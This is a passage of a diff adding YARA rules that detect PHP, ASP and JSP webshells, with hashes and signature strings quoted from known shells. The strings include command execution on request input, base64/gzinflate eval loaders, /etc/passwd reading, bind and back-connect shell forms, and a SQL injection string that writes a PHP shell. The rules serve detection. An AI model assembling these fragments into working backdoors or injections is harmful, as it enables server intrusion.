+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "433706fdc539238803fd47c4394b5109"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":"
+		$s1 = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" fullword
+	condition:
+		all of them
+}
+rule _c99shell_v1_0_php_php_c99php_1_c2007_php_php_c100_php {
+	meta:
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash3 = "d089e7168373a0634e1ac18c0ee00085"
+		hash4 = "38fd7e45f9c11a37463c3ded1c76af4c"
+	strings:
+		$s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword
+	condition:
+		all of them
+}
+rule multiple_php_webshells_2 {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash6 = "09609851caa129e40b0d56e90dfc476c"
+		hash7 = "671cad517edd254352fe7e0c7c981c39"
+	strings:
+		$s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I"
+		$s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma"
+		$s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword
+	condition:
+		all of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_1_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "if ($total === FALSE) {$total = 0;}" fullword
+		$s1 = "$free_percent = round(100/($total/$free),2);" fullword
+		$s2 = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" fullword
+		$s3 = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" fullword
+	condition:
+		2 of them
+}
+rule _r577_php_php_r57_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash3 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s0 = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword
+		$s2 = "'eng_text30'=>'Cat file'," fullword
+		$s3 = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword
+	condition:
+		1 of them
+}
+rule _nixrem_php_php_c99shell_v1_0_php_php_c99php_NIX_REMOTE_WEB_SHELL_v_0_5_alpha_Lite_Public_Version_php {
+	meta:
+		description = "Semi-Auto-generated  - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "40a3e86a63d3d7f063a86aab5b5f92c6"
+		hash1 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash2 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash3 = "f3ca29b7999643507081caab926e2e74"
+	strings:
+		$s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword
+		$s1 = "$ret = posix_kill($pid,$sig);" fullword
+		$s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword
+		$s3 = "$i = $nixpasswd;" fullword
+	condition:
+		2 of them
+}
+
+/* GIF Header webshell */
+
+rule DarkSecurityTeam_Webshell {
+	meta:
+		description = "Dark Security Team Webshell"
+		author = "Florian Roth"
+		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
+		score = 50
+	strings:
+		$s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii
+	condition:
+		1 of them
+}
+
+rule GIFCloaked_Webshell {
+	meta:
+		description = "Looks like a webshell cloaked as GIF"
+		author = "Florian Roth"
+		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
+		score = 50
+	strings:
+		$magic = { 47 49 46 38 } /* GIF8 ... */
+		$s0 = "input type"		
+		$s1 = "<%eval request"
+		$s2 = "<%eval(Request.Item["
+		$s3 = "LANGUAGE='VBScript'"
+	condition:
+		( $magic at 0 ) and ( 1 of ($s*) )
+}
+
+rule PHP_Cloaked_Webshell_SuperFetchExec {
+	meta:
+		description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC"
+		reference = "http://goo.gl/xFvioC"
+		author = "Florian Roth"
+		score = 50
+	strings:
+		$s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"		
+	condition:
+		$s0
+}
+
+/* PHP Webshell Update - August 2014 - deducted from https://github.com/JohnTroony/php-webshells */
+
+rule WebShell_RemExp_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file RemExp.asp.php.txt"
+		author = "Florian Roth"
+		hash = "d9919dcf94a70d5180650de8b81669fa1c10c5a2"
+	strings:
+		$s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword
+		$s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+		$s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword
+		$s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword
+		$s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\">  Name</td>" fullword
+	condition:
+		all of them
+}
+rule WebShell_dC3_Security_Crew_Shell_PRiV {
+	meta:
+		description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php"
+		author = "Florian Roth"
+		hash = "1b2a4a7174ca170b4e3a8cdf4814c92695134c8a"
+	strings:
+		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+		$s4 = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword
+		$s5 = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword
+		$s15 = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword
+		$s16 = "echo base64_decode($images[$_GET['pic']]);" fullword
+		$s20 = "if (isset($_GET['rename_all'])) {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_simattacker {
+	meta:
+		description = "PHP Webshells Github Archive - file simattacker.php"
+		author = "Florian Roth"
+		hash = "258297b62aeaf4650ce04642ad5f19be25ec29c9"
+	strings:
+		$s1 = "$from = rand (71,1020000000).\"@\".\"Attacker.com\";" fullword
+		$s4 = "&nbsp;Turkish Hackers : WWW.ALTURKS.COM <br>" fullword
+		$s5 = "&nbsp;Programer : SimAttacker - Edited By KingDefacer<br>" fullword
+		$s6 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
+		$s10 = "&nbsp;e-mail : kingdefacer@msn.com<br>" fullword
+		$s17 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
+		$s18 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
+		$s20 = "$Comments=$_POST['Comments'];" fullword
+	condition:
+		2 of them
+}
+rule WebShell_DTool_Pro {
+	meta:
+		description = "PHP Webshells Github Archive - file DTool Pro.php"
+		author = "Florian Roth"
+		hash = "e2ee1c7ba7b05994f65710b7bbf935954f2c3353"
+	strings:
+		$s1 = "function PHPget(){inclVar(); if(confirm(\"O PHPget agora oferece uma lista pront"
+		$s2 = "<font size=3>by r3v3ng4ns - revengans@gmail.com </font>" fullword
+		$s3 = "function PHPwriter(){inclVar();var url=prompt(\"[ PHPwriter ] by r3v3ng4ns\\nDig"
+		$s11 = "//Turns the 'ls' command more usefull, showing it as it looks in the shell" fullword
+		$s13 = "if (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";" fullword
+		$s14 = "//To keep the changes in the url, when using the 'GET' way to send php variables" fullword
+		$s16 = "function PHPf(){inclVar();var o=prompt(\"[ PHPfilEditor ] by r3v3ng4ns\\nDigite "
+		$s18 = "if(empty($fu)) $fu = @$_GET['fu'];" fullword
+	condition:
+		3 of them
+}
+rule WebShell_ironshell {
+	meta:
+		description = "PHP Webshells Github Archive - file ironshell.php"
+		author = "Florian Roth"
+		hash = "d47b8ba98ea8061404defc6b3a30839c4444a262"
+	strings:
+		$s0 = "<title>'.getenv(\"HTTP_HOST\").' ~ Shell I</title>" fullword
+		$s2 = "$link = mysql_connect($_POST['host'], $_POST['username'], $_POST"
+		$s4 = "error_reporting(0); //If there is an error, we'll show it, k?" fullword
+		$s8 = "print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&d"
+		$s15 = "if(!is_numeric($_POST['timelimit']))" fullword
+		$s16 = "if($_POST['chars'] == \"9999\")" fullword
+		$s17 = "<option value=\\\"az\\\">a - zzzzz</option>" fullword
+		$s18 = "print shell_exec($command);" fullword
+	condition:
+		3 of them
+}
+rule WebShell_indexer_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file indexer.asp.php.txt"
+		author = "Florian Roth"
+		hash = "e9a7aa5eb1fb228117dc85298c7d3ecd8e288a2d"
+	strings:
+		$s0 = "<meta http-equiv=\"Content-Language\" content=\"tr\">" fullword
+		$s1 = "<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>" fullword
+		$s2 = "<form action=\"?Gonder\" method=\"post\">" fullword
+		$s4 = "<form action=\"?oku\" method=\"post\">" fullword
+		$s7 = "var message=\"SaNaLTeRoR - " fullword
+		$s8 = "nDexEr - Reader\"" fullword
+	condition:
+		3 of them
+}
+rule WebShell_toolaspshell {
+	meta:
+		description = "PHP Webshells Github Archive - file toolaspshell.php"
+		author = "Florian Roth"
+		hash = "11d236b0d1c2da30828ffd2f393dd4c6a1022e3f"
+	strings:
+		$s0 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef"
+		$s12 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword
+		$s20 = "destino3 = folderItem.path & \"\\index.asp\"" fullword
+	condition:
+		2 of them
+}
+rule WebShell_b374k_mini_shell_php_php {
+	meta:
+		description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php"
+		author = "Florian Roth"
+		hash = "afb88635fbdd9ebe86b650cc220d3012a8c35143"
+	strings:
+		$s0 = "@error_reporting(0);" fullword
+		$s2 = "@eval(gzinflate(base64_decode($code)));" fullword
+		$s3 = "@set_time_limit(0); " fullword
+	condition:
+		all of them
+}
+rule WebShell_Sincap_1_0 {
+	meta:
+		description = "PHP Webshells Github Archive - file Sincap 1.0.php"
+		author = "Florian Roth"
+		hash = "9b72635ff1410fa40c4e15513ae3a496d54f971c"
+	strings:
+		$s4 = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" fullword
+		$s5 = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" fullword
+		$s9 = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" fullword
+		$s12 = "while (($ekinci=readdir ($sedat))){" fullword
+		$s19 = "$deger2= \"$ich[$tampon4]\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell_b374k_php {
+	meta:
+		description = "PHP Webshells Github Archive - file b374k.php.php"
+		author = "Florian Roth"
+		hash = "04c99efd187cf29dc4e5603c51be44170987bce2"
+	strings:
+		$s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword
+		$s6 = "// password (default is: b374k)"
+		$s8 = "//******************************************************************************"
+		$s9 = "// b374k 2.2" fullword
+		$s10 = "eval(\"?>\".gzinflate(base64_decode("
+	condition:
+		3 of them
+}
+rule WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend {
+	meta:
+		description = "PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+		author = "Florian Roth"
+		hash = "6454cc5ab73143d72cf0025a81bd1fe710351b44"
+	strings:
+		$s4 = "&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>" fullword
+		$s5 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
+		$s10 = "<a style=\"TEXT-DECORATION: none\" href=\"http://www.simorgh-ev.com\">" fullword
+		$s16 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
+		$s17 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
+		$s19 = "$Comments=$_POST['Comments'];" fullword
+		$s20 = "Victim Mail :<br><input type='text' name='to' ><br>" fullword
+	condition:
+		3 of them
+}
+rule WebShell_h4ntu_shell__powered_by_tsoi_ {
+	meta:
+		description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php"
+		author = "Florian Roth"
+		hash = "cbca8cd000e705357e2a7e0cf8262678706f18f9"
+	strings:
+		$s11 = "<title>h4ntu shell [powered by tsoi]</title>" fullword
+		$s13 = "$cmd = $_POST['cmd'];" fullword
+		$s16 = "$uname = posix_uname( );" fullword
+		$s17 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword
+		$s18 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>"
+		$s20 = "ob_end_clean();" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_webshells_MyShell {
+	meta:
+		description = "PHP Webshells Github Archive - file MyShell.php"
+		author = "Florian Roth"
+		hash = "42e283c594c4d061f80a18f5ade0717d3fb2f76d"
+	strings:
+		$s3 = "<title>MyShell error - Access Denied</title>" fullword
+		$s4 = "$adminEmail = \"youremail@yourserver.com\";" fullword
+		$s5 = "//A workdir has been asked for - we chdir to that dir." fullword
+		$s6 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
+		$s13 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword
+		$s14 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword
+		$s19 = "#every command you excecute." fullword
+		$s20 = "<form name=\"shell\" method=\"post\">" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_webshells_pws {
+	meta:
+		description = "PHP Webshells Github Archive - file pws.php"
+		author = "Florian Roth"
+		hash = "7a405f1c179a84ff8ac09a42177a2bcd8a1a481b"
+	strings:
+		$s6 = "if ($_POST['cmd']){" fullword
+		$s7 = "$cmd = $_POST['cmd'];" fullword
+		$s10 = "echo \"FILE UPLOADED TO $dez\";" fullword
+		$s11 = "if (file_exists($uploaded)) {" fullword
+		$s12 = "copy($uploaded, $dez);" fullword
+		$s17 = "passthru($cmd);" fullword
+	condition:
+		4 of them
+}
+rule WebShell_reader_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file reader.asp.php.txt"
+		author = "Florian Roth"
+		hash = "70656f3495e2b3ad391a77d5208eec0fb9e2d931"
+	strings:
+		$s5 = "ster\" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail"
+		$s12 = " HACKING " fullword
+		$s16 = "FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: "
+		$s20 = "PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG"
+	condition:
+		3 of them
+}
+rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php"
+		author = "Florian Roth"
+		hash = "db076b7c80d2a5279cab2578aa19cb18aea92832"
+	strings:
+		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
+		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
+		$s9 = "\".htmlspecialchars($file).\" has been already loaded. PHP Emperor <xb5@hotmail."
+		$s11 = "die(\"<FONT COLOR=\\\"RED\\\"><CENTER>Sorry... File" fullword
+		$s15 = "if(empty($_GET['file'])){" fullword
+		$s16 = "echo \"<head><title>Safe Mode Shell</title></head>\"; " fullword
+	condition:
+		3 of them
+}
+rule WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {
+	meta:
+		description = "PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+		author = "Florian Roth"
+		hash = "b2b797707e09c12ff5e632af84b394ad41a46fa4"
+	strings:
+		$s4 = "$liz0zim=shell_exec($_POST[liz0]); " fullword
+		$s6 = "$liz0=shell_exec($_POST[baba]); " fullword
+		$s9 = "echo \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E"
+		$s12 = " :=) :</font><select size=\"1\" name=\"liz0\">" fullword
+		$s13 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+	condition:
+		1 of them
+}
+rule WebShell_php_backdoor {
+	meta:
+		description = "PHP Webshells Github Archive - file php-backdoor.php"
+		author = "Florian Roth"
+		hash = "b190c03af4f3fb52adc20eb0f5d4d151020c74fe"
+	strings:
+		$s5 = "http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix" fullword
+		$s6 = "// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi"
+		$s11 = "if(!isset($_REQUEST['dir'])) die('hey,specify directory!');" fullword
+		$s13 = "else echo \"<a href='$PHP_SELF?f=$d/$dir'><font color=black>\";" fullword
+		$s15 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
+	condition:
+		1 of them
+}
+rule WebShell_Worse_Linux_Shell {
+	meta:
+		description = "PHP Webshells Github Archive - file Worse Linux Shell.php"
+		author = "Florian Roth"
+		hash = "64623ab1246bc8f7d256b25f244eb2b41f543e96"
+	strings:
+		$s4 = "if( $_POST['_act'] == \"Upload!\" ) {" fullword
+		$s5 = "print \"<center><h1>#worst @dal.net</h1></center>\";" fullword
+		$s7 = "print \"<center><h1>Linux Shells</h1></center>\";" fullword
+		$s8 = "$currentCMD = \"ls -la\";" fullword
+		$s14 = "print \"<tr><td><b>System type:</b></td><td>$UName</td></tr>\";" fullword
+		$s19 = "$currentCMD = str_replace(\"\\\\\\\\\",\"\\\\\",$_POST['_cmd']);" fullword
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_pHpINJ {
+	meta:
+		description = "PHP Webshells Github Archive - file pHpINJ.php"
+		author = "Florian Roth"
+		hash = "75116bee1ab122861b155cc1ce45a112c28b9596"
+	strings:
+		$s3 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword
+		$s10 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword
+		$s11 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN"
+		$s13 = "Full server path to a writable file which will contain the Php Shell <br />" fullword
+		$s14 = "$expurl= $url.\"?id=\".$sql ;" fullword
+		$s15 = "<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />" fullword
+		$s16 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword
+	condition:
+		1 of them
+}
+rule WebShell_php_webshells_NGH {
+	meta:
+		description = "PHP Webshells Github Archive - file NGH.php"
+		author = "Florian Roth"
+		hash = "c05b5deecfc6de972aa4652cb66da89cfb3e1645"
+	strings:
+		$s0 = "<title>Webcommander at <?=$_SERVER[\"HTTP_HOST\"]?></title>" fullword
+		$s2 = "/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */" fullword
+		$s5 = "<form action=<?=$script?>?act=bindshell method=POST>" fullword
+		$s9 = "<form action=<?=$script?>?act=backconnect method=POST>" fullword
+		$s11 = "<form action=<?=$script?>?act=mkdir method=POST>" fullword
+		$s16 = "die(\"<font color=#DF0000>Login error</font>\");" fullword
+		$s20 = "<b>Bind /bin/bash at port: </b><input type=text name=port size=8>" fullword
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_matamu {
+	meta:
+		description = "PHP Webshells Github Archive - file matamu.php"
+		author = "Florian Roth"
+		hash = "d477aae6bd2f288b578dbf05c1c46b3aaa474733"
+	strings:
+		$s2 = "$command .= ' -F';" fullword
+		$s3 = "/* We try and match a cd command. */" fullword
+		$s4 = "directory... Trust me - it works :-) */" fullword
+		$s5 = "$command .= \" 1> $tmpfile 2>&1; \" ." fullword
+		$s10 = "$new_dir = $regs[1]; // 'cd /something/...'" fullword
+		$s16 = "/* The last / in work_dir were the first charecter." fullword
+	condition:
+		2 of them
+}
+rule WebShell_ru24_post_sh {
+	meta:
+		description = "PHP Webshells Github Archive - file ru24_post_sh.php"
+		author = "Florian Roth"
+		hash = "d2c18766a1cd4dda928c12ff7b519578ccec0769"
+	strings:
+		$s1 = "http://www.ru24-team.net" fullword
+		$s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
+		$s6 = "Ru24PostWebShell"
+		$s7 = "Writed by DreAmeRz" fullword
+		$s9 = "$function=passthru; // system, exec, cmd" fullword
+	condition:
+		1 of them
+}
+rule WebShell_hiddens_shell_v1 {
+	meta:
+		description = "PHP Webshells Github Archive - file hiddens shell v1.php"
+		author = "Florian Roth"
+		hash = "1674bd40eb98b48427c547bf9143aa7fbe2f4a59"
+	strings:
+		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
+	condition:
+		all of them
+}
+rule WebShell_c99_madnet {
+	meta:
+		description = "PHP Webshells Github Archive - file c99_madnet.php"
+		author = "Florian Roth"
+		hash = "17613df393d0a99fd5bea18b2d4707f566cff219"
+	strings:
+		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
+		$s1 = "eval(gzinflate(base64_decode('"
+		$s2 = "$pass = \"pass\";  //Pass" fullword
+		$s3 = "$login = \"user\"; //Login" fullword
+		$s4 = "             //Authentication" fullword
+	condition:
+		all of them
+}
+rule WebShell_c99_locus7s {
+	meta:
+		description = "PHP Webshells Github Archive - file c99_locus7s.php"
+		author = "Florian Roth"
+		hash = "d413d4700daed07561c9f95e1468fb80238fbf3c"
+	strings:
+		$s8 = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword
+		$s9 = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y"
+		$s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq"
+		$s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword
+		$s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword
+	condition:
+		2 of them
+}
+rule WebShell_JspWebshell_1_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file JspWebshell_1.2.php"
+		author = "Florian Roth"
+		hash = "0bed4a1966117dd872ac9e8dceceb54024a030fa"
+	strings:
+		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+		$s1 = "String password=request.getParameter(\"password\");" fullword
+		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
+		$s7 = "String editfile=request.getParameter(\"editfile\");" fullword
+		$s8 = "//String tempfilename=request.getParameter(\"file\");" fullword
+		$s12 = "password = (String)session.getAttribute(\"password\");" fullword
+	condition:
+		3 of them
+}
+rule WebShell_safe0ver {
+	meta:
+		description = "PHP Webshells Github Archive - file safe0ver.php"
+		author = "Florian Roth"
+		hash = "366639526d92bd38ff7218b8539ac0f154190eb8"
+	strings:
+		$s3 = "$scriptident = \"$scriptTitle By Evilc0der.com\";" fullword
+		$s4 = "while (file_exists(\"$lastdir/newfile$i.txt\"))" fullword
+		$s5 = "else { /* <!-- Then it must be a File... --> */" fullword
+		$s7 = "$contents .= htmlentities( $line ) ;" fullword
+		$s8 = "<br><p><br>Safe Mode ByPAss<p><form method=\"POST\">" fullword
+		$s14 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
+		$s20 = "/* <!-- End of Actions --> */" fullword
+	condition:
+		3 of them
+}
+rule WebShell_Uploader {
+	meta:
+		description = "PHP Webshells Github Archive - file Uploader.php"
+		author = "Florian Roth"
+		hash = "e216c5863a23fde8a449c31660fd413d77cce0b7"
+	strings:
+		$s1 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+	condition:
+		all of them
+}
+rule WebShell_php_webshells_kral {
+	meta:
+		description = "PHP Webshells Github Archive - file kral.php"
+		author = "Florian Roth"
+		hash = "4cd1d1a2fd448cecc605970e3a89f3c2e5c80dfc"
+	strings:
+		$s1 = "$adres=gethostbyname($ip);" fullword
+		$s3 = "curl_setopt($ch,CURLOPT_POSTFIELDS,\"domain=\".$site);" fullword
+		$s4 = "$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";" fullword
+		$s16 = "echo $son.' <br> <font color=\"green\">Access</font><br>';" fullword
+		$s17 = "<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">BLaSTER</a><br /"
+		$s20 = "<p><strong>Server listeleyici</strong><br />" fullword
+	condition:
+		2 of them
+}
+rule WebShell_cgitelnet {
+	meta:
+		description = "PHP Webshells Github Archive - file cgitelnet.php"
+		author = "Florian Roth"
+		hash = "72e5f0e4cd438e47b6454de297267770a36cbeb3"
+	strings:
+		$s9 = "# Author Homepage: http://www.rohitab.com/" fullword
+		$s10 = "elsif($Action eq \"command\") # user wants to run a command" fullword
+		$s18 = "# in a command line on Windows NT." fullword
+		$s20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell_simple_backdoor {
+	meta:
+		description = "PHP Webshells Github Archive - file simple-backdoor.php"
+		author = "Florian Roth"
+		hash = "edcd5157a68fa00723a506ca86d6cbb8884ef512"
+	strings:
+		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
+		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+		$s3 = "        echo \"</pre>\";" fullword
+		$s4 = "        $cmd = ($_REQUEST['cmd']);" fullword
+		$s5 = "        echo \"<pre>\";" fullword
+		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s7 = "        die;" fullword
+		$s8 = "        system($cmd);" fullword
+	condition:
+		all of them
+}
+rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+		author = "Florian Roth"
+		hash = "8fdd4e0e87c044177e9e1c97084eb5b18e2f1c25"
+	strings:
+		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
+		$s3 = "xb5@hotmail.com</FONT></CENTER></B>\");" fullword
+		$s4 = "$v = @ini_get(\"open_basedir\");" fullword
+		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
+	condition:
+		2 of them
+}
+rule WebShell_NTDaddy_v1_9 {
+	meta:
+		description = "PHP Webshells Github Archive - file NTDaddy v1.9.php"
+		author = "Florian Roth"
+		hash = "79519aa407fff72b7510c6a63c877f2e07d7554b"
+	strings:
+		$s2 = "|     -obzerve : mr_o@ihateclowns.com |" fullword
+		$s6 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
+		$s13 = "<form action=ntdaddy.asp method=post>" fullword
+		$s17 = "response.write(\"<ERROR: THIS IS NOT A TEXT FILE>\")" fullword
+	condition:
+		2 of them
+}
+rule WebShell_lamashell {
+	meta:
+		description = "PHP Webshells Github Archive - file lamashell.php"
+		author = "Florian Roth"
+		hash = "b71181e0d899b2b07bc55aebb27da6706ea1b560"
+	strings:
+		$s0 = "if(($_POST['exe']) == \"Execute\") {" fullword
+		$s8 = "$curcmd = $_POST['king'];" fullword
